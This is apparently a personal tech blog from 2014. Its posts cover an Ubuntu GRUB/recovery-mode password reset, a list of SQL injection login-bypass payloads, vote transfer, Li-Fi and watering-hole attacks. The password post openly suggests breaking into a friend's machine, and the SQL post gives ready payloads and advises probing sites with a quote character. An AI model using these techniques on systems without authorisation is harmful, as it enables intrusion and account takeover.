Sunday, 3 August 2014

Reset Ubuntu Password or Go into Some One UBUNTU os !!

Hello friends , I post this article that help you in reset in password for Ubuntu or may use when u do not know the password of your friend's UBUNTU MACHINE .
I search on net and then write in a very abstract manner so that u can easily reset your password. S0 if you have forget your username or  password then don’t worry ----- just follow these steps .
Use these steps n fell happy :-) :)
  • first step is Restart your Machine.Our main moto behind restart is to get grub menu.
  • For getting grub menu ..just HOLD right Shift Button until you will get not  “GRUB Loading“ window. note hold right shift key only.
  • Then from Kernel and Recovery mode , select Kernel 
  • Now if every thing is going good then we have to edit the entry for that Press e key .
  • Then you get a long text and search for the line that starting with the word 'linux'
  • When you get that word then write the init=/bin/bash to the end of the linux line. write carefully .
  • Now our next step is to boot with our changes so for boot press F10 or CTRl X.
  • Now our next task is to mount file system into R/W that is read and write so that we can make changes to the privileges or in laymen language to reset password.
  • For this use this command --->> mount -o remount,rw /
  • Now it time to reset password for that to have to execute this command that is --->> passwd .
  •  If u are the root user then use this command -->> passwd
  • Other wise use this -->>User passwd (user-name)
  • Now its time to enjoy :-)  :-) restart your machine and enter the password that you set !!
There is one more step using recovery mode first try recovery mode if you cannot able to change then use this one.

Reset password using RECOVERY MODE::

We can reset password using recovery mode also .
For this first comes in GRUB menu as i mention earlier .
  • First restart and press RIGHT SHIFT KEY .
  • Then select recovery mode.
  • After recovery mode wait for boot -up process.
  • Select root from the pop up window.
  • Then again use command --> mount -o remount,rw /
  •  Then use command --> passwd <user name>
  • To find user name use command --> ls/ after mount command.
  • Then press ENTER and type EXIT.
  • After this press resume on the coming window.

Now Login with your password.







Thursday, 17 July 2014

Sql injection!!



Hello friends , here i will show u the sql injection --- how we perform and where it can be ---what will be code .

Here i will give answers to all question.

step1 ::
      first we use various test beds like "DVWA " or "MUTALIDATE" so that we can learn how it is performed.

      so go and install any one test bed(recommended)
     
      Note:: Check wheather vulnerability exists in web site or not.
     
            To check that use " ' " <only ' this > in any login page.
            If you find some error then it means vulnerability exists and you can perform sql injection.

step 2::

      here i am giving the list of various code that will help in bypassing and getting information from web site.


Bypassing Login Screens (SMO+)

SQL Injection 101, Login tricks

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
....
Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
*Old versions of MySQL doesn't support union queries

Friday, 11 July 2014

Must Vote !!!

Hello friends, we are living in an modern era where every thing transform into digital world.

We have every thing --money ,man power, brilliant brain ...but still we are lacking behind in technology and other essential things as compared to developed countries . In 1947 when we became independent 1 rs equal to 1 $ but now a days they become 60 times richer than us. Politics effect every thing if our nation was in good hand then definitely our life style change . Now a days we are more aware and cast out vote . Casting vote is maximum in the world . In 2014 election total numbers of voters are 70+ crore but only 50+ cr went for voting .


These thing are known to every one but i post this for giving a new information that leads to maximize the voting . There are many students studying in various state and at the time of voting they are unable to cast their vote because the date is different in every location and they cannot come for one day for vote .They do not have holiday on that day if they study far form their home town . I am also not gave my vote because i am living in Allahabad and my home town is in Haryana .


But do not worry their is one option if we want to give vote... if we are living too far from home town then we can transfer our vote :-)   :-)   .. just give application to election commissioner before 3 month and then you can cast your vote where you study . :-)  :-)

So friends use this facility and help our nation ..  

Saturday, 10 May 2014

Li Fi- A new Technology for internet connection



Li Fi- A new Technology for internet connection

Li fi – a new revolutionary  technology in wireless communication. Nowadays scientists research on the fast data transfer technologies, they develop a new way for data transfer through which we can transfer data upto250 times more than any existing technology.
Telling something!!
 Li fi uses the light as the medium while Wi Fi uses the radio frequencies. Li Fi is more secure than Wi Fi because the light waves used cannot penetrate the walls. It can be used in electromagnetic sensitive areas without causing interference like in aircraft or nuclear plants.
During the TED talk in 2011, Edinburgh University's Prof Harald Haas coined the term Li-Fi which is also known as VLC(visible light communication).  A joint research between the universities of Oxford, Cambridge, Edinburgh, St Andrews and  Strathclyde, carried out the research in this field under the Ultra Parallel Visible Light Communications project ,funded by Engineering and Physical Sciences Research Council. Using the single microchip existing LED light bulbs could be converted into Li Fi signals. In situations where radio frequencies cannot use due to the fear of interference this technology would be best. Using Orthogonal Frequency Divisional Multiplexing (OFDM)- a digital modulation technique , researchers enabled micro-LED light bulbs to handle millions of changes in light intensity per second, effectively behaving like an extremely fast on/off switch. This helps in sending large amount of binary data - a series of ones and zeros - to be transmitted at very high speed. The researchers used the three primary colors - red, green, blue to transmit data.

What achieved!!
Chinese achieved the speed of 3.5 Gbps through LED bulbs. While UK scientist’s one step ahead reports that they got 10 Gbps speed that is 250 times faster than the any ‘super-fast’ broadband. Fraunhofer Heinrich Hertz Institute in Germany achieved 3 GB per second speed this year.

How differ from Wi- Fi!!
Both transfer data over electromagnetic spectrum but Li- Fi uses visible light and Wi-Fi utilizes the radio waves for wireless internet access. Speed of data transfer is high in Li-Fi .As Wi-Fi uses the radio spectrum which is limited so only limited number of router and tower can deploy. Li Fi while can be deployed in every day LED bulbs which covers the entire building through light based connection. The data connection speed can reach in Gbps.

Drawbacks!!
 It is dependent on light ,so cannot work in darkness as light not penetrates walls.Lifi receiver must be within 3 meter diameter of router and placed in the LED bulbs so that sensor read it easily.
Li-Fi system is not portable.

Cyber-attack strategy – WATERING HOLE



Cyber-attack strategy – WATERING HOLE
Nowadays cybercriminal develops a new strategy for cyber-attack known as “watering hole”. Cybercriminals again prove that they are one step ahead – no security method or procedure can stop them. They are so skilled that they can get any information.
In watering hole attack, hacker leverages cloud services to help in accessing the most secure government agencies and private enterprisers also.
Talking about PAST :
In earlier days, attacker using the email which is bad worded or like “I LOVE U” or getting wealth /lottery. Attackers target the individuals of a specific company through phishing attack so that they can access the company critical information. These specific  targeted individuals helps in navigate the organization employees hierarchy  or  identify  digital certificate compromises  that leads to access and gives control  over  the  organization infrastructure.
NOWADAYS:
Nowadays employees are aware so they discard the email. The most sophisticated type of attack is hitting the enterprise through “Watering Hole Attack”. In this attack, attacker insert the malicious code in the site that company trust. For this they stalk an employee or group in order to insert malicious code in company.
How to find TRUST sites::
To insert the malicious code in the most visited sites like yahoo, espn.com or cnn.com is very tough because they are less vulnerable. So insert the code into less secure site which mostly frequented by employees of targeted company.
Attacker find the most frequent site by automated tracking methods used by marketing and ad tracking services when employees surfs internet from their  company. This method helps in identifying the traffic patterns and access.  These tracking services are mapping the web pattern behavioral of the organization. This indicates which sites employees frequently visited. This information helps the attacker to deduce the organization browsing history and cloud services access policies. In other words, it tells an attacker about which watering hole you let your employees visit.


WAIT!!
The attacker plants the malicious code in watering hole site. They also insert the code in less secure blogs and the most vulnerable sites. They wait for the users to visit the frequently visited sites in past. When user visits the sites, the malicious code redirects the user’s browser to malicious sites and user’s machine can be assessed for vulnerabilities. The probability of success is usually high because attacker uses the tracking services’ data to confirm that traffic to sites is allowed and frequent.
After in TRAP-- Ready for real attack::
When user steps in trap, then attacker start assessing for vulnerabilities and exploits. When user visits the watering hole, a small piece of code is downloaded in the background automatically so there is no need to click or download any code or file. This is possible by drive -by downloading techniques. Once the code run, it searches for recently discovered exploits and zero -day vulnerabilities. Because there is a chance those users have not patched these exploits in Java, Internet Explorer, and Flash or Adobe reader. If attacker got success in finding the vulnerabilities /exploits and then depending on the user's access right, he can access sensitive and critical information of the company. The sensitive information means Internet protocol, customer’s information, employee’s data or financial data.